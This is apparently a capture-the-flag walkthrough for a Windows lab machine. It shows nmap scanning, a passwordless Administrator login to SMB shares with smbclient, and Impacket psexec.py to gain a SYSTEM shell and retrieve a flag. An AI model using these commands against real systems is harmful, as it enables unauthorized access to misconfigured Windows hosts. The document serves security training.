Tactics - Windows

Ping and Nmap the target Ip using sudo nmap -sC -Pn {target Ip} where -Pn treats all hosts as online and skips the host discovery phase which is essentially a complex ping scan. This type of scan is often blocked by firewalls as it is a nonstandard connection request or scan attempt

We find 3 open ports in the scan, port 135/tcp running msrpc, which is a remote procedure call (RPC) that supports communication between Windows applications. RPC is a low-level form of inter-process communication where a client process can make requests of a server.

We also find port 139/tcp open running netbios-ssn, which is used for NetBIOS. NetBIOS (network basic input/output system) allows applications on separate computers to communicate over a local area network through the session layer of the OSI model.

The final open port, and the one we’ll be looking into, is port 445/tcp open running Microsoft-ds which is used for the SMB. SMB (server message block) is a file sharing protocol that needs an open port on a computer or server to communicate with another system (usually port 139 or 445).

We can attempt to extract some information from the SMB using the smbclient tool, if not installed we can run sudo apt install smbclient, and then use smbclient -h or man smbclient to get a list of commands and flags we can use. In this case we’ll run smbclient -L {target Ip} -U Administrator with a passwordless login (Enter) hoping for a misconfiguration of the Administrator account. -L lists available shares on the target Ip, and -U specifies the username. This command gains us Administrator access to the SMB.

On this machine there are 2 main options of attack, first we could smbclient to navigate to the C$ share with Administrator authorization or use PSexec.py from Impacket. We’ll go over the first method and then the second.

Using smbclient, we’ll use the command smbclient \\\\{target Ip}\\C$ -U Administrator to gain access to the C$ file system and use dir to list the directories in the share. It’s important to note that the $ symbol at the end of a share indicates that it’s an administrative share.

With access to the C$ share, we can navigate to the flag on the Administrators desktop using cd Users\Administrator\Desktop, and download the flag using get flag.txt.

We can then exit the SMB and use cat flag.txt to read the file and capture the flag.

For the second method, we’ll use a tool called psexec.py to exploit the misconfiguration of the ADMIN$ share and get the interactive system shell. Psexec.py is part of the Impacket framework, which is written in Python and used for working with network protocols. It is focused on low-level programmatic access to the packets and for some protocols like SMB, the protocol implementation itself. The specific tool psexec.py is named after the utility PsExec from Microsoft’s Sysinternals suite since it allows us to execute a fully interactive shell on remote Windows machines similarly to PsExec.

To install Impacket we’ll first run git clone https://github.com/SecureAuthCorp/impacket.git, and change to the new directory using cd Impacket. We can also use Impacket -h for a list of commands and flags.

We can then change to the examples directory in Impacket which contains the psexec.py file, then run python3 psexec.py adminstrator@{target Ip} with the syntax for getting an interactive shell from a target being python psexec.py username:password@hostIP, in this case there is no password, so we leave it blank.

After using whoami we can conclude that we got the shell with the highest privileges (NT Authority/System) and can browse the file system to again download and capture the flag.